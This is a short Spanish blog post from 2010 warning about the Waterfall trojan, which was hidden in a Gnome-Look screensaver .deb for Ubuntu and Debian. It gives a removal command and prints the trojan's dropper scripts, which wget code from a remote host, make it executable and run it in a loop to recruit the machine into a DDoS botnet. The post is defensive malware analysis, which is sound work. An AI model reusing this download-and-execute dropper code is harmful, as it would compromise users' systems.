Troyano Waterfall en Ubuntu
Ubuntu no es inmune a los troyanos y virus. En esta caso se trata de Waterfall, un troyano para Ubuntu y otros sistemas Linux basados en Debian. Se encuentra oculto en un fichero .deb de salvapantallas que se había colocado en Gnome-Look.
Como saber si está infectado por el Troyano Waterfall
Solo en el caso de que haya instalado el fichero .deb en cuestión y solo en ese caso, abrir un terminal y ejecutar el siguiente comando:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
Este troyano accede al sistema cuando el usuario descarga e instala desde Gnome-Look lo que aparentemente es un salvapantallas con una imagen de una cascada.
Dentro del fichero .deb se encuentra un script con el siguiente código:
#!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit
Al ser instalado, se descargan otros scripts que al ser ejecutados descargan nuevo código malicioso.
Por ejemplo, el contenido del fichero Auto.bash es el siguiente:
while : do rm /usr/bin/run.bash cd /usr/bin/ wget http://05748.t35.com/Bots/index.php wget http://05748.t35.com/Bots/run.bash sleep 4 rm index.php chmod 755 run.bash command -p /usr/bin/run.bash done
El objetivo final del troyano es hacer parte al PC infectado de un ataque de denegación de servicio distribuido (DDOS)
Nombre completo: Trojan.LINUX/Waterfall
Tipo: [Trojan] – Caballo de Troya: programa que parece beneficioso o útil pero resulta ser malicioso en algún momento. No se propaga por sí mismo.
Plataforma: [LINUX] – Linux
NOTA: El salvapantallas ha sido eliminado de la web de Gnome-Look.
NOTA: Los ficheros que el troyano descarga desde http://05748.t35.com ya no están disponibles.
zmakanteri:
:O
Escrito en 25th julio 2010 a las 9:27